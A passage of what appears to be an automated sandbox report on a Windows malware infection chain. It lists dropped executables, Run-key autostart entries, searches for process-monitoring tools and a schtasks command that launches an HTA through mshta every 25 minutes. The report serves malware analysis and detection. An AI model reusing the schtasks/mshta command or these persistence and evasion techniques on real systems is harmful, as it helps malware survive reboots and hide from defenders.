                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile created: C:\Users\user\AppData\Local\Temp\D51OAO8D0TVNMCQXHC.exeJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\2qv26zF[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10128600101\60eb3ded99.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeJump to dropped file

                      Boot Survival

                      barindex
                      Creates multiple autostart registry keys
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19be97887a.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6f3323f1e6.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bb5ad48269.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ab5415a7b5.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c6e8248d4e.exe
                      Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "j5aLnmalkX9" /tr "mshta \"C:\Temp\mtzRdqIHD.hta\"" /sc minute /mo 25 /ru "user" /f
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile created: C:\Windows\Tasks\rapes.jobJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19be97887a.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19be97887a.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bb5ad48269.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bb5ad48269.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c6e8248d4e.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c6e8248d4e.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ab5415a7b5.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ab5415a7b5.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6f3323f1e6.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6f3323f1e6.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0091F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,34_2_0091F98E
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00991C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,34_2_00991C41
                      Source: C:\Windows\System32\spoolsv.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5BC501E5-01E5-5BC5-CF2C-029728CF0C95} {912B21FC-21FC-912B-EF35-EC5D31EFE25F}
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
